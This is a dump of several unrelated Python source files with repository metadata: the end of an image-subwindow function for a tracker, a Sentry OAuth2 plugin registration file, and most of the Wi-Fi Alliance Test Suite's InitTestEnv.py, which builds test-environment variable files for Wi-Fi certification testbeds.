ys[ys >= im.shape[0]] = im.shape[0] - 1
xs[xs < 0] = 0
xs[xs >= im.shape[1]] = im.shape[1] - 1
# 提取子窗剪切的图像块
out = im[pylab.ix_(ys, xs)]
# 将图像像素值从 [0, 1] 平移到 [-0.5, 0.5]
out = out.astype(pylab.float64) - 0.5
# 余弦窗口化,论文公式 (18)
return pylab.multiply(cos_window, out)
if __name__ == '__main__':
image_path = r'..\data\surfer\imgs'
image_list = os.listdir(image_path)
image = os.path.join(image_path, image_list[0])
img = mpimg.imread(image)
gray = rgb2gray.rgb2gray(rgb_image=img)
position = np.array([152., 286.])
size = np.array([35., 32.])
cos_window = pylab.outer(pylab.hanning(size[0]), pylab.hanning(size[1]))
result = get_subwindow(im=gray, pos=position, sz=size, cos_window=cos_window)
print(pylab.hanning(size[0]))
print(cos_window)
plt.imshow(result)
plt.show()
| UTF-8 | Python | false | false | 2,437 | py | 14 | get_subwindow.py | 12 | 0.600198 | 0.569025 | 0 | 63 | 30.079365 | 86 |
77629296/sentry_auth_chy | 4,483,945,898,586 | 88dbdec71605fb8d1368755e9b87406b4aa5b876 | 6a7f43215d392743648a23f159291436072f8e5f | /sentry_auth_chy/__init__.py | 5c1af97bce6dfb798f0f841960cba1b86960431d | [
"Apache-2.0"
]
| permissive | https://github.com/77629296/sentry_auth_chy | 7eba2eb0d2bb946521423b30def42320ca654f10 | 042cf650c044ff861b750122c8c35252b49ce8e5 | refs/heads/master | 2022-12-02T20:37:45.512568 | 2020-08-11T11:38:54 | 2020-08-11T11:38:54 | 286,728,533 | 0 | 1 | null | null | null | null | null | null | null | null | null | null | null | null | null | from __future__ import absolute_import
from sentry.auth import register
from .provider import ChyOAuth2Provider
register('chy', ChyOAuth2Provider)
| UTF-8 | Python | false | false | 150 | py | 3 | __init__.py | 2 | 0.806667 | 0.793333 | 0 | 7 | 20.428571 | 39 |
WFA-HarshMadhiwalla/Wi-FiTestSuite-UCC | 13,297,218,764,215 | 15b30409437a72a24ef597d294437a26d9483949 | 49de835262f53fa622637985d9f59e58cd87d503 | /python/InitTestEnv.py | fb2c5bf8d26d7b5b30af52bad85849c9c832bc6a | [
"ISC"
]
| permissive | https://github.com/WFA-HarshMadhiwalla/Wi-FiTestSuite-UCC | e7cbaaceb900092bd77785f33dd4a5d1107f5845 | 3384478abb92ad29dfb658abdf89dbd7064ce16f | refs/heads/master | 2020-04-05T02:36:48.489688 | 2016-10-18T23:33:51 | 2016-10-18T23:33:51 | 41,568,632 | 0 | 0 | null | true | 2015-08-28T20:52:25 | 2015-08-28T20:52:25 | 2015-08-27T06:32:10 | 2015-08-25T18:28:01 | 1,229 | 0 | 0 | 0 | null | null | null | ###################################################################
#
# Copyright (c) 2014 Wi-Fi Alliance
#
# Permission to use, copy, modify, and/or distribute this software for any
# purpose with or without fee is hereby granted, provided that the above
# copyright notice and this permission notice appear in all copies.
#
# THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES
# WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
# MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY
# SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES WHATSOEVER
# RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN ACTION OF CONTRACT,
# NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF OR IN CONNECTION WITH THE
# USE OR PERFORMANCE OF THIS SOFTWARE.
#
###################################################################
#!/usr/bin/evn python
import os, sys
from socket import *
from time import gmtime, strftime
import thread, time, Queue, os
import sys, time
from select import select
import logging
import re
import ctypes
import pprint
import xml.dom.minidom
from xml.dom.minidom import Node
import HTML
from decimal import Decimal
### Input Files ####
MasterTestInfo = "\MasterTestInfo.xml"
DUTInfoFile = "\DUTInfo.txt"
TestbedAPFile = "\802.11n-Testbed-APs.txt"
InitFile = "\init_802.11n.txt"
RADIUSServer = "\RADIUS-Servers.txt"
STAMACAddress = "\STA_MAC_Addresses.txt"
APMACAddress = "\AP_MAC_Addresses.txt"
ProgName = os.getenv("PROG_NAME")
TestbedAPList = "\TestbedAPNames.txt"
### Output Files ####
InitEnvLogFile = "InitEnvLog.log"
#File which would be used by UCC core
UCCInitEnvFile = "\InitEnv.txt"
LogFile = ""
DUTFeatureInfoFile = "./log/DUTFeatureInfo.html"
#Variable List
VarList = {}
# List of EAPMethods
EAPList = ["TLS", "TTLS", "PEAP0", "FAST", "PEAP1", "SIM", "AKA", "AKA\'", "PWD"]
# List of WPS Config Methods
WPSConfigList = ["WPS_Keypad", "WPS_Display", "WPS_PushButton", "WPS_Label"]
#default command file path
uccPath = "..\\cmds"
bandSelectionList = {}
doc = ""
#Global Object to handle Test ENV Variables
testEnvVariables = ""
# Qualification changes
qual = 0
QualAP = ""
QualSTA = ""
# Main function
def InitTestEnv(testID, cmdPath, progName, initFile, TBFile, q=0, qualAP="", qualSTA=""):
global MasterTestInfo, DUTInfoFile, doc, InitFile, TestbedAPFile, ProgName, uccPath, testEnvVariables, QualAP, QualSTA, qual, VarList
uccPath = cmdPath
VarList = {}
doc = xml.dom.minidom.parse(uccPath + MasterTestInfo)
InitFile = "\\" + initFile
ProgName = progName
TestbedAPFile = "\\" + TBFile
TestID = testID
testEnvVariables = envVariables()
# For test bed qualification only
if q:
qual = q
QualAP = qualAP
QualSTA = qualSTA
#TestID=TestID.split('_')[0]
InitLog(InitEnvLogFile)
ReadDUTInfo(DUTInfoFile, TestID)
LogMsg("Input Files - \n MasterTestInfo = %s \n DUTInfoFile =%s \n" %(MasterTestInfo, DUTInfoFile))
#Check for WEP Support
if getattr(dutInfoObject, "WEP") == "1":
LogMsg("WEP is supported by DUT ")
if check_isNode_Level1("%s-%s" % (TestID, "WEP")):
TestID = ("%s-%s"%(TestID, "WEP"))
LogMsg("Test ID = %s" % TestID)
LogMsg("----Test ID = %s-------" % TestID)
GetCAPIFileNames(TestID)
GetTestbedDeviceInfo(TestID)
if ProgName == "P2P" or ProgName == "WFD" or ProgName == "WFDS" or ProgName == "NAN":
GetP2PVariables(TestID)
if not (ProgName == "P2P" or ProgName == "TDLS" or ProgName == "NAN"):
GetServerSupplicantInfo(TestID)
if ProgName == "HS2-R2":
GetSubscriptionServerInfo(TestID)
GetSnifferInfo(TestID)
LogMsg(dutInfoObject)
LogMsg(testEnvVariables)
GetOtherVariables(TestID)
createUCCInitEnvFile(UCCInitEnvFile)
createDownloadLog()
#
# Class: dutInfo
# This class holds all the required information about DUT
#
class dutInfo:
def __init__(self,
DUTType="",
DUTCategory="",
DUTBand="",
TestCaseID="",
DUTEAPMethod="",
WEP=0,
preAuth=0,
_11h=0,
SupportedChannelWidth=0,
Streams=0,
Greenfield=0,
SGI20=0,
SGI40=0,
RIFS_TX=0,
Coexistence_2040=0,
STBC_RX=0,
STBC_TX=0,
MCS32=0,
WTSSupport=1,
WTSTrafficSupport=1,
OBSS=0,
AMPDU_TX=0,
AP_Concurrent=0,
TDLSDiscReq=0,
PUSleepSTA=0,
_11d=0,
STAUT_PM=0,
Open_Mode=0,
Mixedmode_WPA2WPA=0,
PMF_OOB=0,
ASD=0,
AC_VO=0,
AC_VI=0,
AC_BE=0,
AC_BK=0):
self.DUTType = DUTType
self.DUTCategory = DUTCategory
self.DUTBand = DUTBand
self.TestCaseID = TestCaseID
self.DUTEAPMethod = DUTEAPMethod
self.WEP = WEP
self.PreAuth = preAuth
self._11h = _11h
self.SupportedChannelWidth = SupportedChannelWidth
self.Streams = Streams
self.Greenfield = Greenfield
self.SGI20 = SGI20
self.SGI40 = SGI40
self.RIFS_TX = RIFS_TX
self.Coexistence_2040 = Coexistence_2040
self.STBC_RX = STBC_RX
self.STBC_TX = STBC_TX
self.MCS32 = MCS32
self.WTSSupport = WTSSupport
self.WTSTrafficSupport = WTSTrafficSupport
self.OBSS = OBSS
self.AMPDU_TX = AMPDU_TX
self.AP_Concurrent = AP_Concurrent
self._11d = _11d
self.STAUT_PM = STAUT_PM
self.Open_Mode = Open_Mode
self.Mixedmode_WPA2WPA = Mixedmode_WPA2WPA
self.PMF_OOB = PMF_OOB
#TDLS Specific
self.TDLSDiscReq = TDLSDiscReq
self.PUSleepSTA = PUSleepSTA
#ASD Device
self.ASD = ASD
#ASD AC stream support
self.AC_VO = AC_VO
self.AC_VI = AC_VI
self.AC_BE = AC_BE
self.AC_BK = AC_BK
def __setattr__(self, attr, value):
self.__dict__[attr] = value
def __str__(self):
return ("""Type = %s
Category = %s
Band = %s
EAP = %s
TestCase = %s
WEP = %s
PreAuth = %s
11h = %s
WTS Support = %s
WTS Traffic Support = %s
11d = %s
STAUT_PM = %s""" %
(self.DUTType,
self.DUTCategory,
self.DUTBand,
self.DUTEAPMethod,
self.TestCaseID,
self.WEP,
self.PreAuth,
self._11h,
self.WTSSupport,
self.WTSTrafficSupport,
self._11d,
self.STAUT_PM))
#Global Object to handle DUT Information
dutInfoObject = dutInfo()
#
# Class: testbedAP
# This class holds all the required variables for any testbed AP
#
class testbedAP:
def __init__(self, Name="", Number=0, state="off"):
self.Name = Name
self.Number = Number
self.State = state
def formatAPUCC(self):
return "\n\ndefine!$AP%s!%s!\ndefine!$AP%sPowerSwitchPort!%s!\ndefine!$AP%sState!%s!\ndefine!$AP%sIPAddress!%s!\n" % (self.Number, self.Name, self.Number, GetAPPortNumber(self.Name), self.Number, self.State, self.Number, GetAPIPAddress(self.Name))
def __str__(self):
return "AP Name = %s | AP Number = %s | AP Powerswitch Port = %s | AP IP Address = %s | AP State = %s" % (self.Name, self.Number, GetAPPortNumber(self.Name), GetAPIPAddress(self.Name), self.State)
class server:
def __init__(self, Name="-", IP=0, Port="-", Password="-", supplicant="-", tesbedsupplicant="-"):
self.name = Name
self.IP = IP
self.Port = Port
self.Password = Password
self.Supplicant = supplicant
self.STASupplicant = tesbedsupplicant
def formatUCC(self):
return "\n\ndefine!$RADIUSIPAddress!%s!\ndefine!$RADIUSPort!%s!\ndefine!$RADIUSSharedSecret!%s!\ndefine!$SupplicantName!%s!\ndefine!$STASupplicantName!%s!\n" % (self.IP, self.Port, self.Password, self.Supplicant, self.STASupplicant)
def __str__(self):
return "RADIUS Name = %s | RADIUS IP = %s | RADIUS Port = %s | RADIUS Shared Secret = %s | Supplicant = %s | Testbed STA Supplicant = %s" % (self.name, self.IP, self.Port, self.Password, self.Supplicant, self.STASupplicant)
#Global Object to handle server Information
serverInfo = server()
class envVariables:
"""This class holds all the required variables for the test"""
global ProgName, uccPath
def __init__(self,
Channel="",
Channel_1="",
Channel_2="",
Channel_3="",
Band="",
SSID="",
SSID_1="",
SSID_2="",
SSID_3="",
TSTA1="",
TSTA2="",
TSTA3="",
TSTA4="",
TSTA5="",
TestbedConfigCAPIFile="",
DUTConfigCAPIFile="",
STAConfigCAPIFile="",
WLANTestCAPIFile=""):
self.Channel = Channel
self.Channel_1 = Channel_1
self.Channel_2 = Channel_2
self.Channel_3 = Channel_3
self.Band = Band
self.SSID = SSID
self.SSID_1 = SSID_1
self.SSID_2 = SSID_2
self.SSID_3 = SSID_3
self.APs = {}
# For each program, create a file 'TestbedAPNames.txt' in cmds folder and list the name of APs in that file
# E.G., for 11n, create a file 'TestbedAPNames.txt' in cmds\WTS-11n folder with list of AP Names
if os.path.exists(uccPath + TestbedAPList):
APNames = open(uccPath + TestbedAPList, 'r')
for l in APNames.readlines():
n = l.rstrip("\n")
self.APs.setdefault(n, testbedAP(n))
else:
print "No Testbed APs-"
self.TSTA1 = TSTA1
self.TSTA2 = TSTA2
self.TSTA3 = TSTA3
self.TSTA4 = TSTA4
self.TSTA5 = TSTA5
self.TestbedConfigCAPIFile = TestbedConfigCAPIFile
self.DUTConfigCAPIFile = DUTConfigCAPIFile
self.STAConfigCAPIFile = STAConfigCAPIFile
self.WLANTestCAPIFile = WLANTestCAPIFile
def __setattr__(self, attr, value):
self.__dict__[attr] = value
def formatNameUCC(self):
return ("""define!$Channel!%s!\n
define!$Channel_1!%s!\n
define!$Channel_2!%s!\n
define!$Channel_3!%s!\n
define!$Band!%s!\n
define!$SSID!%s!\n
define!$SSID_1!%s!\n
define!$SSID_2!%s!\n
define!$SSID_3!%s!\n
define!$STA1!%s!\n
define!$STA2!%s!\n
define!$STA3!%s!\n
define!$TestbedConfigCAPIFile!%s!\n
define!$DUTConfigCAPIFile!%s!\n
define!$STAConfigCAPIFile!%s!\n
define!$WLANTestCAPIFile!%s!\n""" %
(self.Channel,
self.Channel_1,
self.Channel_2,
self.Channel_3,
self.Band,
self.SSID,
self.SSID_1,
self.SSID_2,
self.SSID_3,
self.TSTA1,
self.TSTA2,
self.TSTA3,
self.TestbedConfigCAPIFile,
self.DUTConfigCAPIFile,
self.STAConfigCAPIFile,
self.WLANTestCAPIFile))
def __str__(self):
return ("""Channel = %s
Channel_1 = %s
Channel_2 = %s
Channel_3 = %s |
Band = %s |
SSID = %s
SSID_1 = %s
SSID_2 = %s
SSID_3 = %s |
STA1 - %s
STA2 - %s
STA3 - %s
Testbed File - %s
DUTConfig File - %s
STAConfig File - %s
WLANTest File - %s""" %
(self.Channel,
self.Channel_1,
self.Channel_2,
self.Channel_3,
self.Band,
self.SSID,
self.SSID_1,
self.SSID_2,
self.SSID_3,
self.TSTA1,
self.TSTA2,
self.TSTA3,
self.TestbedConfigCAPIFile,
self.DUTConfigCAPIFile,
self.STAConfigCAPIFile,
self.WLANTestCAPIFile))
def InitLog(FileName):
"""
Initializes the log file
Parameters
----------
FileName : str
Returns
-------
Pass(1)/Fail(-1) : int
"""
global LogFile
LogFile = open(FileName, 'w')
return 1
def LogMsg(Msg):
"""
Writes the message to the log file
Parameters
----------
Msg : str
Returns
-------
void
"""
global LogFile
LogFile.write("\n %s - %s" %(time.strftime("%H-%M-%S_%b-%d-%y", time.localtime()), Msg))
return
def createUCCInitEnvFile(filename):
"""
Creates the Init Environment file for UCC core and writes all the
required variables from class object of envVariables
Parameters
----------
filename : str
Returns
-------
Pass(1)/Fail(-1) : int
"""
global ProgName
if (ProgName == "N"):
prtcID="0"
if os.path.exists(uccPath+filename) == 1:
InitEnvHd = open(uccPath+filename, 'r')
FileCon = InitEnvHd.readlines()
for line in FileCon:
if "$tcID" in line:
LineCon=line.split("!")
prtcID = LineCon[2]
InitEnvHd.close()
LogMsg("Init file created --- > %s" % (uccPath+filename))
uccInitFile = open(uccPath+filename, 'w')
uccInitFile.write("# This is an auto generated file - %s \n# For test case - %s\n#DO NOT modify this file manually \n\n" %(time.strftime("%b-%d-%y_%H:%M:%S", time.localtime()), dutInfoObject.TestCaseID))
uccInitFile.write("\ndefine!$tcID!%s!\n"%(dutInfoObject.TestCaseID))
if (ProgName == "N"):
uccInitFile.write("\ndefine!$prtcID!%s!\n"%(prtcID))
uccInitFile.write(testEnvVariables.formatNameUCC())
for p in testEnvVariables.APs:
uccInitFile.write(testEnvVariables.APs[p].formatAPUCC())
uccInitFile.write(serverInfo.formatUCC())
#Writing other variables
for var in VarList:
uccInitFile.write("\ndefine!$%s!%s!\n"%(var, VarList[var]))
uccInitFile.write("#EOF")
uccInitFile.close()
return
def ReadDUTInfo(filename, TestCaseID):
"""
This Function reads the DUT Info (Band, DUT Type, Category) from
DUTInfo.txt file and load them into the class object of envVariables
Parameters
----------
filename : str
TestCaseID : str
Returns
-------
Pass(1)/Fail(-1) : int
"""
LogMsg("Read DUT Info Function")
DUTFile = uccPath+filename
dutInfoObject.__setattr__("DUTType", ReadMapFile(DUTFile, "DUTType", "!"))
dutInfoObject.__setattr__("DUTBand", ReadMapFile(DUTFile, "DUTBand", "!"))
dutInfoObject.__setattr__("DUTCategory", ReadMapFile(DUTFile, "DUTCategory", "!"))
dutInfoObject.__setattr__("WEP", ReadMapFile(DUTFile, "WEP", "!"))
dutInfoObject.__setattr__("PreAuth", ReadMapFile(DUTFile, "PreAuth", "!"))
dutInfoObject.__setattr__("_11h", ReadMapFile(DUTFile, "11h", "!"))
dutInfoObject.__setattr__("SupportedChannelWidth", ReadMapFile(DUTFile, "SupportedChannelWidth", "!"))
dutInfoObject.__setattr__("Streams", ReadMapFile(DUTFile, "Streams", "!"))
dutInfoObject.__setattr__("Greenfield", ReadMapFile(DUTFile, "Greenfield", "!"))
dutInfoObject.__setattr__("SGI20", ReadMapFile(DUTFile, "SGI20", "!"))
dutInfoObject.__setattr__("SGI40", ReadMapFile(DUTFile, "SGI40", "!"))
dutInfoObject.__setattr__("RIFS_TX", ReadMapFile(DUTFile, "RIFS_TX", "!"))
dutInfoObject.__setattr__("Coexistence_2040", ReadMapFile(DUTFile, "Coexistence_2040", "!"))
dutInfoObject.__setattr__("STBC_RX", ReadMapFile(DUTFile, "STBC_RX", "!"))
dutInfoObject.__setattr__("STBC_TX", ReadMapFile(DUTFile, "STBC_TX", "!"))
dutInfoObject.__setattr__("MCS32", ReadMapFile(DUTFile, "MCS32", "!"))
dutInfoObject.__setattr__("WTSSupport", ReadMapFile(DUTFile, "WTS_ControlAgent_Support", "!"))
dutInfoObject.__setattr__("WTSTrafficSupport", ReadMapFile(DUTFile, "WTS_TrafficAgent_Support", "!"))
dutInfoObject.__setattr__("OBSS", ReadMapFile(DUTFile, "OBSS", "!"))
dutInfoObject.__setattr__("AMPDU_TX", ReadMapFile(DUTFile, "AMPDU_TX", "!"))
dutInfoObject.__setattr__("AP_Concurrent", ReadMapFile(DUTFile, "AP_Concurrent", "!"))
dutInfoObject.__setattr__("_11d", ReadMapFile(DUTFile, "11d", "!"))
dutInfoObject.__setattr__("STAUT_PM", ReadMapFile(DUTFile, "STAUT_PM", "!"))
dutInfoObject.__setattr__("Open_Mode", ReadMapFile(DUTFile, "Open_Mode", "!"))
dutInfoObject.__setattr__("Mixedmode_WPA2WPA", ReadMapFile(DUTFile, "Mixedmode_WPA2WPA", "!"))
dutInfoObject.__setattr__("PMF_OOB", ReadMapFile(DUTFile, "PMF_OOB", "!"))
#EAP Methods
dutInfoObject.__setattr__("TLS", ReadMapFile(DUTFile, "TLS", "!"))
dutInfoObject.__setattr__("TTLS", ReadMapFile(DUTFile, "TTLS", "!"))
dutInfoObject.__setattr__("PEAP0", ReadMapFile(DUTFile, "PEAP0", "!"))
dutInfoObject.__setattr__("PEAP1", ReadMapFile(DUTFile, "PEAP1", "!"))
dutInfoObject.__setattr__("FAST", ReadMapFile(DUTFile, "FAST", "!"))
dutInfoObject.__setattr__("SIM", ReadMapFile(DUTFile, "SIM", "!"))
dutInfoObject.__setattr__("AKA", ReadMapFile(DUTFile, "AKA", "!"))
dutInfoObject.__setattr__("AKA'", ReadMapFile(DUTFile, "AKA'", "!"))
dutInfoObject.__setattr__("PWD", ReadMapFile(DUTFile, "PWD", "!"))
#VE Specific
dutInfoObject.__setattr__("BSS_Trans_Query_Support", ReadMapFile(DUTFile, "BSS_Trans_Query_Support", "!"))
dutInfoObject.__setattr__("TSM_Support", ReadMapFile(DUTFile, "TSM_Support", "!"))
#TDLS Specific
dutInfoObject.__setattr__("TDLSDiscReq", ReadMapFile(DUTFile, "DiscoveryRequest_Support", "!"))
dutInfoObject.__setattr__("PUSleepSTA", ReadMapFile(DUTFile, "PUAPSDSleepSTA_Support", "!"))
dutInfoObject.__setattr__("TestCaseID", TestCaseID)
#Default method is TTLS
dutInfoObject.__setattr__("DUTEAPMethod", "TTLS")
#ASD device testing
dutInfoObject.__setattr__("ASD", ReadMapFile(DUTFile, "ASD", "!"))
#ASD AC streams support
dutInfoObject.__setattr__("AC_VO", ReadMapFile(DUTFile, "AC_VO", "!"))
dutInfoObject.__setattr__("AC_VI", ReadMapFile(DUTFile, "AC_VI", "!"))
dutInfoObject.__setattr__("AC_BE", ReadMapFile(DUTFile, "AC_BE", "!"))
dutInfoObject.__setattr__("AC_BK", ReadMapFile(DUTFile, "AC_BK", "!"))
for EAP in EAPList:
Ret = ReadMapFile(DUTFile, EAP, "!")
if int(Ret) == 1:
dutInfoObject.__setattr__("DUTEAPMethod", EAP)
break
if TestCaseID == "WPA2-5.8" and dutInfoObject._11h == "0":
LogMsg("11h not supported by DUT; Skipping the Test.")
VarList.setdefault("TestNA", "11h not supported by DUT; Skipping the Test.")
if TestCaseID == "WPA2-5.5.1" and dutInfoObject.PreAuth == "0":
LogMsg("Pre Authentication not supported by DUT; Skipping the Test.")
VarList.setdefault("TestNA", "Pre Authentication not supported by DUT; Skipping the Test.")
if "N-4.2" in TestCaseID or "N-ExA" in TestCaseID:
VarList.setdefault("APUT_state", "on")
if "N-5.2" in TestCaseID or "N-ExS" in TestCaseID:
VarList.setdefault("APUT_state", "off")
if (ProgName == "P2P" or
ProgName == "TDLS" or
ProgName == "PMF" or
ProgName == "HS2" or
ProgName == "WFD" or
ProgName == "WFDS" or
ProgName == "VHT" or
ProgName == "HS2-R2" or
ProgName == "WMMPS" or
ProgName == "NAN" or
ProgName == "60GHz" or
ProgName == "WPS"):
fFile = open(DUTFeatureInfoFile, "w")
T = HTML.Table(col_width=['70%', '30%'])
R1 = HTML.TableRow(cells=['Optional Feature', 'DUT Support'], bgcolor="Gray", header="True")
T.rows.append(R1)
if (ProgName == "P2P" or
ProgName == "TDLS" or
ProgName == "HS2" or
ProgName == "WFD" or
ProgName == "WFDS" or
ProgName == "HS2-R2" or
ProgName == "NAN"):
P2PVarList = ReadAllMapFile(DUTFile, ProgName, "!")
if P2PVarList != -1:
P2PVarList = P2PVarList.split('!')
LogMsg("P2P Supported Features = %s" % P2PVarList)
for var in P2PVarList:
if var != "":
v = var.split(',')
VarList.setdefault(v[0], v[1])
featureSupport = find_TestcaseInfo_Level1(TestCaseID, v[0])
if featureSupport != "":
LogMsg("%s-%s" % (featureSupport, v[1]))
if featureSupport != v[1]:
LogMsg("DUT does not support the feature")
VarList.setdefault("TestNA", "DUT does not support the feature")
if v[1] == "0":
dis = "No"
elif v[1] == "1":
dis = "Yes"
else:
dis = v[1]
if "DUT_" not in v[0]:
T.rows.append([v[0], dis])
else:
ProgVarList = ReadAllMapFile(DUTFile, ProgName, "!")
if ProgVarList != -1:
ProgVarList = ProgVarList.split('!')
LogMsg("%s Supported Features = %s" % (ProgName, ProgVarList))
checkFeatureFlag = find_TestcaseInfo_Level1(TestCaseID, "checkFeatureFlag")
LogMsg("checkFeatureFlag = %s" % checkFeatureFlag)
for var in ProgVarList:
if var != "":
v = var.split(',')
VarList.setdefault(v[0], v[1])
featureSupport = find_TestcaseInfo_Level1(TestCaseID, v[0])
#LogMsg("Feature Support = %s" % featureSupport)
if checkFeatureFlag == v[0]:
LogMsg("%s-%s"%(checkFeatureFlag, v[1]))
if v[1] != "1":
LogMsg("DUT does not support the feature")
VarList.setdefault("TestNA", "DUT does not support the feature")
if v[1] == "0":
dis = "No"
elif v[1] == "1":
dis = "Yes"
else:
dis = v[1]
if "DUT_" not in v[0]:
T.rows.append([v[0], dis])
htmlcode = str(T)
fFile.write(htmlcode)
fFile.write('<p>')
return 1
def GetCAPIFileNames(TestCaseID):
"""
Gets the CAPI file name for Testbed Config, DUT Config for given
testcaseID and load them into the class object of testEnvVariables
Parameters
----------
TestCaseID : str
Returns
-------
Pass(1)/Fail(-1) : int
"""
global ProgName
setattr(testEnvVariables, "TestbedConfigCAPIFile", find_TestbedFile(TestCaseID))
if (int(dutInfoObject.WTSSupport) == 0 and
ProgName != "P2P" and
ProgName != "HS2" and
ProgName != "WFD" and
ProgName != "WFDS" and
ProgName != "HS2-R2" and
ProgName != "WMMPS" and
ProgName != "NAN"):
setattr(testEnvVariables, "DUTConfigCAPIFile", "NoWTSSupportMsg.txt")
VarList.setdefault("WTSMsg", "Configure DUT for Testcase = -- %s --" % TestCaseID)
VarList.setdefault("DUT_WTS_VERSION", "NA")
else:
setattr(testEnvVariables, "DUTConfigCAPIFile", find_STAFile(TestCaseID, "DUTFile"))
VarList.setdefault("WTSMsg", "")
setattr(testEnvVariables, "STAConfigCAPIFile", find_STAFile(TestCaseID, "STAFile"))
if ProgName == "PMF":
setattr(testEnvVariables, "WLANTestCAPIFile", find_WLANTestFile(TestCaseID, "WLanTestFile"))
return 1
def GetServerSupplicantInfo(TestCaseID):
"""
Gets the RADIUS Server Information and
Supplicant name for given test and load them into Env file
Parameters
----------
TestCaseID : str
Returns
-------
Pass(1)/Fail(-1) : int
"""
if dutInfoObject.DUTEAPMethod == "TLS":
tag = "TLS"
else:
tag = "Other"
serverName = find_Server(TestCaseID, tag)
VarList.setdefault("RadiusServerName", serverName)
if dutInfoObject.DUTCategory != -1:
suppName = find_Supplicant(TestCaseID, "DUT", dutInfoObject.DUTCategory.lower())
setattr(serverInfo, "Supplicant", suppName)
staSuppName = find_Supplicant(TestCaseID, "STA", "c2")
setattr(serverInfo, "STASupplicant", staSuppName)
setattr(serverInfo, "name", serverName)
setattr(serverInfo, "IP", ReadMapFile(uccPath+RADIUSServer, "%s%s"%(serverName, "IPAddress"), "!"))
setattr(serverInfo, "Port", ReadMapFile(uccPath+RADIUSServer, "%s%s"%(serverName, "Port"), "!"))
setattr(serverInfo, "Password", ReadMapFile(uccPath+RADIUSServer, "%s%s"%(serverName, "SharedSecret"), "!"))
LogMsg(serverInfo)
def GetSnifferInfo(TestCaseID):
"""
Gets the value set in init file and sets sniffer default
to start/stop or disable
Parameters
----------
TestCaseID : str
Returns
-------
void
"""
sniffer_enable = ReadMapFile(uccPath+InitFile, "sniffer_enable", "!")
VarList.setdefault("SnifferFileName", "%s_%s" % ("SnifferTrace", TestCaseID))
if sniffer_enable == '1':
VarList.setdefault("StartSniffer", "Sniffer-Start.txt")
VarList.setdefault("StopSniffer", "Sniffer-Stop.txt")
else:
VarList.setdefault("StartSniffer", "Sniffer-Disable.txt")
VarList.setdefault("StopSniffer", "Sniffer-Disable.txt")
def GetTestbedDeviceInfo(TestCaseID):
"""
Reads the TestbedDevice Info(Name of TestbedAPs,STAs) for given
testcaseID and loads them into the class object of testEnvVariables
Parameters
----------
TestCaseID : str
Returns
-------
Pass(1)/Fail(-1) : int
"""
global ProgName, qual, QualAP, QualSTA
iCount = 1
LogMsg("Read Testbed Device Info Function")
# Searching Band
FindBandChannel(TestCaseID)
# Searching APs
APs = find_TestcaseInfo_Level1(TestCaseID, "AP").split(",")
if qual:
APs = QualAP.split(",")
LogMsg("Qualification Mode - APs-[%s]" % APs)
for AP in APs:
if AP == "":
continue
AddTestCaseAP(AP, iCount)
if ProgName == "60GHz":
VarList.setdefault("bssid", ("$%sAPMACAddress_60G"%AP))
VarList.setdefault(("AP%sMACAddress"%iCount), ("$%sAPMACAddress_60G"%AP))
VarList.setdefault("AP%s_wireless_ip"%iCount, ReadMapFile(uccPath+InitFile, "%s_ap_wireless_ip"%AP.lower(), "!"))
elif int(testEnvVariables.Channel) > 35 :
VarList.setdefault("bssid", ("$%sAPMACAddress_5G" % AP))
VarList.setdefault(("AP%sMACAddress"%iCount), ("$%sAPMACAddress_5G" % AP))
VarList.setdefault(("AP%sMACAddress2"%iCount), ("$%sAPMACAddress2_5G" % AP))
VarList.setdefault(("AP%sMACAddress3"%iCount), ("$%sAPMACAddress3_5G" % AP))
else:
VarList.setdefault("bssid", ("$%sAPMACAddress_24G" % AP))
VarList.setdefault(("AP%sMACAddress"%iCount), ("$%sAPMACAddress_24G" % AP))
VarList.setdefault(("AP%sMACAddress2"%iCount), ("$%sAPMACAddress2_24G" % AP))
VarList.setdefault(("AP%sMACAddress3"%iCount), ("$%sAPMACAddress3_24G" % AP))
VarList.setdefault("AP%s_control_agent" %(iCount), "wfa_control_agent_%s_ap" % (AP.lower()))
iCount = iCount+1
for p in testEnvVariables.APs:
if testEnvVariables.APs[p].Number == 0:
testEnvVariables.APs[p].Number = iCount
iCount = iCount+1
LogMsg(testEnvVariables.APs[p])
iCount = 1
# Searching STAs
STAs = find_TestcaseInfo_Level1(TestCaseID, "STA").split(",")
if qual:
STAs = QualSTA.split(",")
LogMsg("Qualification Mode - STAs-[%s]" % STAs)
for STA in STAs:
setattr(testEnvVariables, "TSTA%s" % (iCount), STA)
VarList.setdefault("STA%s_control_agent" % (iCount), "wfa_control_agent_%s_sta" % (STA.lower()))
VarList.setdefault("STA%s_wireless_ip" % iCount, ReadMapFile(uccPath+InitFile, "%s_sta_wireless_ip" % STA.lower(), "!"))
if ProgName == "TDLS":
VarList.setdefault("STA%s_wireless_ip2" % iCount, ReadMapFile(uccPath+InitFile, "%s_sta_wireless_ip2" % STA.lower(), "!"))
VarList.setdefault("STA%s_wireless_ip3" % iCount, ReadMapFile(uccPath+InitFile, "%s_sta_wireless_ip3" % STA.lower(), "!"))
if ProgName == "HS2-R2":
VarList.setdefault("STA%s_wireless_ipv6" % iCount, ReadMapFile(uccPath+InitFile, "%s_sta_wireless_ipv6" % STA.lower(), "!"))
VarList.setdefault("STA%s_MACAddress" % iCount, ("$%sSTAMACAddress"%STA))
iCount = iCount+1
# Searching SSID
iCount = 1
setattr(testEnvVariables, "SSID", find_TestcaseInfo_Level1(TestCaseID, "SSID"))
setattr(testEnvVariables, "SSID_1", find_TestcaseInfo_Level1(TestCaseID, "SSID"))
SSIDs = find_TestcaseInfo_Level1(TestCaseID, "SSID").split(" ")
for SSID in SSIDs:
if len(SSIDs) > 1:
setattr(testEnvVariables, "SSID_%s"%(iCount), SSID)
iCount = iCount + 1
if ProgName != "P2P" and ProgName != "WFD" and ProgName != "WFDS" and ProgName != "NAN":
FindBandChannel(TestCaseID)
return 1
def GetSubscriptionServerInfo(TestCaseID):
"""
Reads the TestbedDevice Info(Name of TestbedAPs,STAs) for given testcaseID and
load them into the class object of testEnvVariables
Parameters
----------
TestcaseID : str
index : str
delim : str
occurs nth instance of index
Returns
-------
